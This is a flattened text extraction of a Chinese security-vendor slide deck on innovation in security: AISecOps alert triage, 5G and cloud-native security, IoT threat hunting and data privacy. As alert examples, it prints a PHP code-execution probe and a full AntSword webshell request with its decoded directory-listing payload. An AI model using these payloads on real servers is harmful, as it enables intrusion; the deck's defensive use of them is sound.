4、劉文懋-創新與孵化：智慧安全的活力與源泉（28頁）.pdf

《4、劉文懋-創新與孵化：智慧安全的活力與源泉（28頁）.pdf》由會員分享，可在線閱讀，更多相關《4、劉文懋-創新與孵化：智慧安全的活力與源泉（28頁）.pdf（28頁珍藏版）》請在三個皮匠報告上搜索。

1、創新與孵化：智慧安全的活力與源泉綠盟科技 劉文懋首席安全專家&創新中心負責人序：5GC安全：業務安全+基礎設施安全案例：AUSF-通過SUCI竊取SUPISUCI錯誤的情況SUCI正確的情況AMFAUSFUDMNausf_UEAuthentication服務正常訪問時的網元調用序列AUSFUDMNausf_UEAuthentication服務被攻擊者利用，竊取SUPI時產生的網元調用序列UDRUDR攻擊發起IP原理：利用Nausf_UEAuthentication服務，通過SUCI竊取SUPI異常場景下的網元序列特征：業務安全：網元異常行為檢測目標：還原5G核心網多種業務場景的網元訪問行為，構

2、建網元異常訪問的檢測基線，檢測偏離基線的異常數據預處理模塊用戶特征提取原始數據業務特征提取特征提取模塊調用序列還原檢測引擎基線參數字典構建參數閾值計算基線構建模塊檢測方案業務流量進行序列還原特征參數提取數值參數關聯計算檢索對比基線尋找偏離基線的業務根據異常的序列特征與參數特征生成告警基礎設施：云網邊端融合的原生安全Host OS+Host Network網卡X:APP1容器Z:APP2容器命名空間1Y:APP1容器Linux bridge訪問控制引擎入侵檢測引擎特權容器數通引擎編排引擎網絡入侵檢測訪問控制命名空間2安全編排層Host OS+Host bridge網卡APP1容器API Sec

3、GWNamespace1Namespace2API Sec GWAPP2容器API Sec GWNamespace3APP3容器API Sec GWNamespace2APPn容器Service Mesh安全編排層云：云原生安全能力網：云原生SASE/5G安全能力邊：云原生MEC能力云原生：未知攻，焉知防 Metarget=meta+target https:/ 安裝內核漏洞：metarget cnv install cve-2016-5195 安裝Docker漏洞：metarget cnv install cve-2019-5736 安裝Kubernetes漏洞：metarget cnv i

4、nstall cve-2018-1002105 Kata-containers逃逸 先容器逃逸，再虛擬機逃逸 涉及：CVE-2020-2023CVE-2020-2025CVE-2020-2026 安全容器不是銀彈！安全容器逃逸創新研究的變遷服務編排孵化度（落地相關）創新度（戰略相關）微創新行業創新產品化研究探索技術創新車聯網無人機區塊鏈工控安全安全數據分析安全應用商店運營/PoC1年2年5年安全資源池物聯網安全威脅情報移動安全Fuzz5G/MEC安全孵化度（落地相關）創新度（戰略相關）微創新行業創新產品化研究探索技術創新MPC/FL/隱私合規量子安全區塊鏈互聯網資產測繪AISecOps云原生安

5、全運營/PoC1年2年3年容器安全物聯網威脅分析數據安全5年天地一體化安全智能攻防威脅狩獵FuzzAI對抗創新研究2017創新研究2021#1 AISecOps：AI賦能安全運營安全運營成熟度分級AISecOps體系感知階段識別檢測認知階段關聯溯源預測決策階段評估制定行動階段響應反饋上下文線索風險策略效果經驗，知識，任務行為數據環境數據情報數據知識數據安全運維的困惑防護設備告警數量過多運維人員無法全面排查對安全運維來說，“有用”的告警到底是什么呢？確實導致安全事件或指示已發生的安全事件攻擊方試圖利用漏洞但沒能成功試探性的惡意行為就算存在漏洞也不會失陷誤報攻擊類告警，但實際并無惡意日志型低危告警

6、難以直接關聯到惡意行為不想漏掉有用的告警不想看無用的告警準確率覆蓋率理想情況安全運維人員引擎1：攻擊意圖識別引擎 找到攻陷事件感知：可擴展的多引擎告警評估技術高信心的漏洞利用C&C會話低試探性不在意漏洞是否存在高試探性想確認漏洞是否存在高利用性如果存在漏洞即構成攻擊低利用性不打算實際利用漏洞誤報告警非惡意行為批量抓雞蠕蟲傳播漏洞掃描信息收集關注程度逐漸提高IPS告警：PHP代碼執行漏洞GET/api.php?background=&code_len=4&font_color=&font_size=14&height=26&op=%24%40print(md5(31337)&width=120

7、HTTP/1.1Host:Cdn-Src-Ip:x.x.x.xX-Forwarded-For:x.x.x.xCookie:PHPSESSID=xxxx;PHPSESSID_NS_Sig=xxxxAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/73.0.3683.103 Safari/537.36X-CCDN-Request

8、ID:908809e2b423bb7cd71a35fd2db52ab8IPS告警：PHP代碼執行漏洞POST/configt.php HTTP/1.1Host:x.x.x.xAccept-Encoding:gzip,deflateUser-Agent:antSword/v2.1Content-Type:application/x-www-form-urlencodedContent-Length:1005Connection:closeneacik=%40eval(%40base64_decode(%24_POST%5Bee6f3b26b000f2%5D)%3B&ee6f3b26b000f2=

9、QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIHN0cl9yb3QxMygkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI0NGUxNjUiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjZjN2ZjOGUiO31vYl9zdGFydCgpO3RyeXsk

10、RD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsidTg4NTVmN2VhNjMxMWYiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIo

11、YmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iCSIuJFQuIgkiLkBmaWxlc2l6ZSgkUCkuIgkiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&u88

12、55f7ea6311f=QzovSW50ZWwv又是掃描，煩！全是沒用的告警！$print(md5(31337)eval(base64_decode($_POSTee6f3b26b000f2);ini_set(display_errors,0);set_time_limit(0);function asenc($out)return str_rot13($out);function asoutput()$output=ob_get_contents();ob_end_clean();echo 44e165;echo asenc($output);echo 6c7fc8e;ob_start();

13、try$D=base64_decode($_POSTu8855f7ea6311f);$F=opendir($D);if($F=NULL)echo(ERROR:/Path Not Found Or No Permission!);else$M=NULL;$L=NULL;while($N=readdir($F)$P=$D.$N;$T=date(Y-m-d H:i:s,filemtime($P);$E=substr(base_convert(fileperms($P),10,8),-4);$R=.$T.filesize($P).$E.;if(is_dir($P)$M.=$N./.$R;else$L.

14、=$N.$R;echo$M.$L;closedir($F);catch(Exception$e)echo ERROR:/.$e-getMessage();asoutput();die();有人搞事啦！不得了啦！救命??！C:/Intel/引擎2：時頻分析引擎 不依賴知識，事件越多，事件越“正?！?，威脅信息越少。引擎3：關聯分析引擎 告警間結構的相似性感知：可擴展的多引擎告警評估技術cont.在真實環境中收集了一周約2300萬條告警,最終認定最接近左上角的10條告警中，至少8條告警均確實是真實惡意攻擊事件。掃描探測類型攻擊手法1攻擊手法2攻擊手法3主機1主機2主機3主機n有針對性的攻擊具有相同或者

15、相近的攻擊特征告警往往具有比較獨特的特征攻擊者攻擊者推薦系統：解決告警淹沒的關鍵技術4大類召回算法多維度動態抽取推薦引擎輸入風險驅動，運營導向評分分項取值評分解釋l_threat_source_topic_index，語義主題編號7表示該事件源端上下文主題編號s_threat_source_topic_anomaly，語義主題異常評分0.9表示該事件類型源端共現主題異常程度s_statistic_ip/msg_rare，低頻事件評分1.0表示該IP/該msg近期出現頻率高低l_static_alevel，告警靜態威脅值3表示告警威脅度字段值大小s_graph_deepwalk_anomaly，

16、節點結構異常評分0.8表示某實體節點的結構孤立程度s_graph_pagerank,節點熱點程度評分0.9表示基于pagerank的節點重要性值可解釋的推薦特征告警類型黑名單事件類型標記威脅情報命中IP白名單傳統運營紅榜TOP10告警載荷完整度告警威脅級別資產類別CVE類型告警出現次數CVE類型低頻告警類型+低頻IP+白名單低頻IP+IP白名單告警信息完整度告警TOPIC編號告警數據量異常告警異常TOPIC資產類別+資產熱度異常漏洞告警閉環威脅情報命中事件類型標記數據驅動運營紅榜TOP10原始告警回歸分析攻擊意圖評分攻擊意圖識別引擎模式計數告警聚合圖分析行為關聯評分關聯分析引擎低頻行為評分時頻

17、分析引擎預處理時頻分析覆蓋率200+特征維度4特征子集認知：基于知識圖譜的事件推理：朔源/預測IPIPIPIPIPIPa1a2a1a3a9a1a2a1a2a1a1a2a2a6溯源預測引擎IPIPheadtailIPIPIP對之間可能的攻擊行為IPIP攻擊者中間實體中間實體受害主機關系推理攻擊者中間實體中間實體受害主機攻擊行為基于關系推理的攻擊路徑修復某場景溯源溯源預測引擎#2 人工智能賦能安全：可解釋性AI檢測引擎可解釋的Webshell檢測引擎Runzi Zhang,Mingkai Tong,Lei Chen,Jianxin Xue,Wenmao Liu,Feng Xie:CMIRGen:A

18、utomatic Signature Generation Algorithm for Malicious Network Traffic.TrustCom 2020:736-743XAIGen：https:/ Frank Isingizwe,Meng Wang,Wenmao Liu,Dongsheng Wang,Tiejun Wu and Jun Li,Analyzing Learning-based Encrypted Malware Traffic Classification with AutoML，ICCT 2021#3 泛物聯網安全研究：車聯網可信根密碼可信進程行為庫可信網絡行為庫

19、系統管理策略管理審計管理可信行為管理協作機制協作機制進程行為網絡行為審計上傳策略下發控制機制判定機制度量機制進程訪問控制機制文件訪問控制機制網絡訪問控制機制數據1數據2數據3訪問控制機制集合數據資源（客體）應用1應用2應用3應用進程（主體）主動監控機制可信平臺監視固件/應用信任管理安安全全SDK驗證驗證資源訪問安全安全SOC未知攻焉知防掛圖作戰：網絡空間資產測繪5876456333467735634954698079761437637168084510924846596829616849696734898173175555727034523053700117630804956073402000

20、00004000000060000000網橋VoIPVPN打印機交換機調制解調器防火墻視頻監控設備路由器暴露數量（臺）設備類型全球國內7,1149,73316,849179,13327,33540,756176,937179,133050,000100,000150,000200,000AMQPMQTTXMPPCoAP暴露數量（個）服務名稱全球國內68%Router80%VoIP25%Camera不同物聯網設備地址變化比例4,752,9264,239,729993,44541,7911,285,907459,311219,93630,73102,000,0004,000,0006,000,00

21、0攝像頭路由器VoIP電話打印機國內物聯網資產真實暴露情況一年一輪One Host with So Many IPs!On The Security Implications of Dynamic Virtual Private Servers,Published in:IEEE Communications Magazine(SCI IF:11.052),59(2),2021互聯網威脅狩獵運營系統業務呈現數據源安全分析威脅情報數據安全設備日志資產（掃描）數據蜜罐數據流量采集數據IoT僵尸網絡分析IoT協議維度分析（UPnP、MQTT、onvif等）資產維度分析（暴露數量多的設備）漏洞維度分析

22、（高危IoT漏洞）威脅預警資產暴露情況攻擊情況漏洞利用情況對外輸出威脅情報漏掃（IoT掃描能力）流量檢測類產品（IoT檢測能力）知識庫（漏洞等）攻擊分析（DDoS等）僵尸網絡態勢蜜罐/資產構造部署威脅分析網絡流量驗證&監控 全球有約91萬個IP開放了WS-Discovery服務，存在被利用進行DDoS攻擊的風險，其中有約73萬是視頻監控設備，約占總量的80%WS-Discovery反射威脅分析土耳其1%意大利1%法國2%波蘭2%墨西哥2%阿根廷2%羅馬尼亞3%俄羅斯3%哥倫比亞3%印度5%韓國8%美國9%巴西9%越南10%中國14%其他27%開放WSD服務的設備國家分布情況7/257/277/

23、297/318/28/48/68/88/108/128/148/168/188/208/228/248/268/288/309/19/39/59/79/99/129/149/169/189/20事件數量日期攻擊事件變化趨勢中國33%美國21%德國8%菲律賓7%英國6%法國5%印度3%巴西2%加拿大2%其它13%受害者國家分布情況互聯網威脅狩獵跟蹤成果時間類型內容2020/2/13攻擊事件國內多個廠商視頻監控設備相關漏洞利用和弱口令爆破數量明顯增多2020/3/18僵尸網絡Polaris僵尸網絡開始利用新漏洞傳播惡意樣本，目標為Netlink廠商路由器2020/6/15攻擊團伙攻擊載荷中包含特定

24、內容“Abcd”的團伙，主要攻擊目標涉及多款路由器和視頻監控設備2020/7/22僵尸網絡Mirai僵尸網絡采用已披露的漏洞，針對Avtech等廠商的視頻監控設備發起新一輪攻擊2020/10/26僵尸網絡新型Gafgyt僵尸網絡DDoS變種開始感染Seowon廠商路由器2020/10/290Day漏洞Lilin NVR104 NTP組件存在遠程代碼執行漏洞Exploit-DB編號披露日期首次捕獲日期日期間隔（天）483652020/4/222020/4/231482252020/3/182020/3/191480772020/2/172020/8/192482712020/3/312020/4

25、/22482682020/3/302020/4/12483182020/4/142020/4/195482472020/3/242020/3/306478352020/1/12020/4/87481072020/2/242020/3/510482472020/3/242020/4/714479612020/1/242020/3/1015483102020/4/132020/5/5222020年，Exploit-DB共披露物聯網相關漏洞利用69個，其中12個被威脅捕獲系統監測到攻擊者的首次利用，最快僅需1天。2020年，威脅捕獲系統首次發現6種新型物聯網相關威脅。Huanran Wang,Wei

26、zhe Zhang,Xing Zhang,Wenmao Liu,Xing Lan,An Evolutionary Study of IoT Malware;IEEE Internet of Things Journal(SCI1區,IF 9.936),2021Yixin Wu,Cheng Huang,Xing Zhang,Hongyi Zhou,GroupTracer:Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things，Security and Communication Netwo

27、rks（CCF-C），2020#4 數據安全與隱私保護郵編姓名手機號年齡110001張三1521111222228310011李四1313333444418110002王五1521111666624310022趙六1313333888820郵編姓名手機號年齡110*1張*152*222230310*1李*131*444420110*2王*152*666620310*2趙*131*888820郵編姓名手機號年齡110*1521111*26310*1313333*19110*1521111*26310*1313333*19脫敏后數據缺乏評估，仍存在不合規風險！國外法規的解讀歐盟：GDPR美國：CC

28、PA 國內法規/標準的解讀網絡安全法數據安全管理辦法（征求意見稿）個人信息安全規范網絡安全法：“第四十二條 網絡運營者不得泄露、篡改、毀損其收集的個人信息；他未經被收集者同意，不得向他人提供個人信息。但是，經過處理無法識別特定個人且不能復原的除外”數據安全與隱私保護 cont.數據脫敏效果的評估技術評估理論與方法快速評估/檢測算法基于信息熵的評估指標體系數據安全場景&關鍵技術關鍵技術安全場景價值性創新性落地性1基于AI的數據分類分級分類分級、個人隱私/重要數據的識別2B2B的聯邦學習數據安全共享、智慧城市、政務數據開放3安全多方計算數據安全共享、智慧城市、政務數據開放4同態加密公有云上的數據安

29、全5基于知識圖譜的數據管理數據資產梳理、數據關聯與流轉的可視化6強魯棒的溯源水印數據泄露實體（單位&個人）的溯源追責7高效實用的數據匿名化匿名化數據的發布/共享/交易的法律免責8UEBA數據異常行為的檢測與告警9數據脫敏評估第三方安全評測、數據交易10區塊鏈數據防篡改、可信的日志溯源校企合作：賦能高度碎片化的深度安全研究鯤鵬基金2017年，綠盟科技與中國計算機學會（CCF）聯合發起CCF-綠盟科技“鯤鵬”科研基金。面向國內高校/科研機構的研究人員和團隊，旨在以小微課題的方式支持科研人員的研究與創新，推動科研技術成果轉化，促進外部科研機構優秀研發能力與公司內部產品價值的深度融合，構建互動合作與創

30、新發展的生態圈，為綠盟科技的產品預研提供支持。哈爾濱工業大學吉林大學西北工業大學成都信息工程大學北京航空航天大學華中科技大學武漢大學信工大廣州大學華南農業大學華南理工大學產教深度融合，校企戰略合作網絡空間安全仿真平臺支撐網絡空間安全學科發展聯合實驗室實踐教學實驗室校園網絡應急響應中心校外實習基地綠盟班廈門理工哈爾濱工程大學西安交通大學固化學術合作運營機制、人員運營鯤鵬學者庫聯合申報重大科研課題提供可供研究的靶場、環境，以及實驗數據定向創新研究成果轉化鯤鵬論壇：體系化、持續化的產學研合作每3個月邀請并組織公司-學院沙龍，擴大覆蓋度每6個月組織具體領域的學術研討會，加深研究合作每2-3個月對鯤鵬基

31、金、定向科研課題做技術跟蹤，夯實研究成果鯤鵬論壇年度技術論壇Workshop/CCF C3微信訂閱號走進系列活動鯤鵬論壇形式1.定位：全國性質論壇，面向與綠盟科技在一年中有緊密合作、聯系、成果產出的老師。2.組織形式：論壇3.會議規模：500人4.特別說明：2020年在TechWorld中首發，2021年在TechWorld進行成果匯報。1.定位：區域性質會議，覆蓋本區域高校、研究機構，以技術交流、方案溝通、行業實踐為主。2.組織形式：小型沙龍3.會議規模：30-50人1.定位：標桿性質活動，覆蓋本區域高校、研究機構，幫助樹立本區域標桿。2.組織形式：小型沙龍3.會議規模：10-20人4.特別

32、說明：本系列活動可分為走進高校、走進企業、走進行業等。1.定位：面向全體項目成員或意向單位老師，進行傳傳播，提高項目內成員的忠誠度與榮譽感。2.發布頻率：每周1-3次，每次3.發布內容：項目最新資訊與動態；參與院校、老師、項目介紹；綠盟科技最新信息；部分校企合作研究成果著作&教材 軟件定義安全：綠盟，清華，北郵 硬件安全教材 湖南大學，綠盟 物聯網安全教材 北航，綠盟研究報告 容器安全報告：綠盟，廣州大學，上交大 聯盟鏈安全報告：綠盟，北航發表學術論文（2019至今）Huanran Wang,Weizhe Zhang,Xing Zhang,Wenmao Liu,Xing Lan,An Evol

33、utionary Study of IoT Malware,IEEE Internet of Things Journal(SCI-1,IF:9.936),2021Guodi Wang,Runzi Zhang,Tong Li,Integrating Heterogeneous Security Knowledge Sources for Comprehensive Security Analysis,COMPSAC(CCF-C),2021Qiuyun Tong,Yinbin Miao,Lei Chen,VFIRM:Verifiable Fine-Grained Encrypted Image

34、Retrieval in Multi-owner Multi-user Settings,IEEE Transactions on Services Computing(SCI-2,IF:5.8),2021Xiaodong Liu,Tong Li,Runzi Zhang,A GAN and Feature Selection-Based Oversampling Technique for Intrusion Detection,Security and Communication Networks(CCF-C),2021Yulai Xie;Minpeng Jin;Zhuping Zou;Go

35、ngming Xu;Dan Feng;Wenmao Liu;Darrell Long,Real-time Prediction of Docker Container Resource Load Based on A Hybrid Model of ARIMA and Triple Exponential Smoothing,IEEE Transactions on Cloud Computing（CCF C),2020Qingyu Yang,Wenmao Liu,Yang Zhang,Defending Against Data Integrity Attacks in Smart Grid

36、:A Deep Reinforcement Learning-Based Approach,IEEE Access(SCI),2019Ziyu Wang,Jianwei Liu,Zongyang Zhang,Yanting Zhang,Jiayuan Yin,Hui Yu,and Wenmao Liu,A Combined Micro-block Chain Truncation Attack on Bitcoin-NG，Australasian Conference on Information Security and Privacy,2019.(CCF-C)時間學校/研究所方向2020.

37、11.17中央財經大學云安全、物聯網安全，AISecOps2021.04.23北京工業大學AISecOps，知識圖譜2021.04.22新加坡國立大學創新研究，靶場2021.05.07中科院信工所AISecOps，數據安全2021.05.11西安交通大學加密流量識別2021.06.01天津大學漏洞挖掘、隱私保護等2021.06.24南開大學數據安全評估，未知威脅，加密流量檢測2021.07.27浙江大學容器安全鯤鵬計劃交流進展(2020.11-2021)基于網絡大數據的關鍵信息基礎設施安全的評價體系研究和應用開發廣東科技廳重點專項華南理工工業互聯網數據可信交換共享服務平臺2020年工業互聯網創

38、新發展工程清華、北郵智能網聯汽車安全檢測平臺北理工省級工業互聯網安全態勢感知平臺項目北京交大人工智能數據安全安全檢測服務平臺建設清華大學安全編排、自動化與響應（SOAR）技術和產品哈工程、哈工大移動邊緣計算（MEC）網絡安全防護技術和產品項目哈工程、南大面向工業互聯網機器人開發及應用安全測試驗證平臺哈工大機器人創新中心數控機床安全防護技術中的密碼應用重慶大學網絡威脅深度分析軟件2020年信息安全軟件項目北理工內生免疫的算力服務網絡框架2020年科技部重點研發計劃北科大、北京大學深圳研究生院、清華、香港城市大學城市智能系統可信任機理與關鍵技術西安交大基于互聯網資源設施風險監測系統與應用示范2020年河北省科技計劃項目河北大學部分校企合作科研項目